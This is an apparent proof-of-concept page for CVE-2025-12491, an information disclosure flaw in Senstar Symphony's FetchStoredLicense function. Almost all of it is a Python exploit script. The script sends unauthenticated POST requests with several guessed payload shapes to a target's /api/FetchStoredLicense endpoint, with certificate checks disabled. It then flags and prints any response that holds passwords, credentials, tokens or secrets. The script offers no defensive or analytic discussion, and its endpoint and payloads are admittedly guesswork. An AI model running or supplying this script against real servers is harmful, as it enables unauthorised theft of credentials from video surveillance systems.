CVE-2025-12491 Senstar Symphony FetchStoredLicense信息泄露漏洞

import requests import json # CVE-2025-12491 PoC - Senstar Symphony FetchStoredLicense Information Disclosure # Target: Senstar Symphony with vulnerable FetchStoredLicense endpoint def exploit_cve_2025_12491(target_url): """ Exploit for CVE-2025-12491: Senstar Symphony FetchStoredLicense Information Disclosure This PoC demonstrates how an unauthenticated attacker can retrieve stored credentials. """ # Construct the vulnerable endpoint # The FetchStoredLicense method is typically exposed via the API endpoint endpoint = f"{target_url.rstrip('/')}/api/FetchStoredLicense" # Try different payload variations payloads = [ {"method": "FetchStoredLicense", "params": {}}, {"method": "FetchStoredLicense", "params": {"licenseKey": "test"}}, {"action": "FetchStoredLicense"}, {"type": "FetchStoredLicense"} ] results = [] for payload in payloads: try: # Send request without authentication response = requests.post( endpoint, json=payload, headers={ "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" }, timeout=10, verify=False ) if response.status_code == 200: data = response.json() # Check if sensitive information is returned if isinstance(data, dict) and any(key in str(data).lower() for key in ['password', 'credential', 'license', 'key', 'token', 'secret']): results.append({ "payload": payload, "status": "VULNERABLE", "response": data }) else: results.append({ "payload": payload, "status": "RESPONSE_RECEIVED", "response": data }) else: results.append({ "payload": payload, "status": f"HTTP_{response.status_code}" }) except requests.exceptions.RequestException as e: results.append({ "payload": payload, "status": "ERROR", "error": str(e) }) return results if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python cve_2025_12491_poc.py <target_url>") print("Example: python cve_2025_12491_poc.py https://vulnerable-senstar-server.com") sys.exit(1) target = sys.argv[1] print(f"[*] Testing target: {target}") print(f"[*] Exploiting CVE-2025-12491...") results = exploit_cve_2025_12491(target) for result in results: print(f"\n[Result] Payload: {result['payload']}") print(f"Status: {result['status']}") if 'response' in result: print(f"Response: {json.dumps(result['response'], indent=2)}") print("\n[*] Scan complete. Review results above for sensitive data exposure.")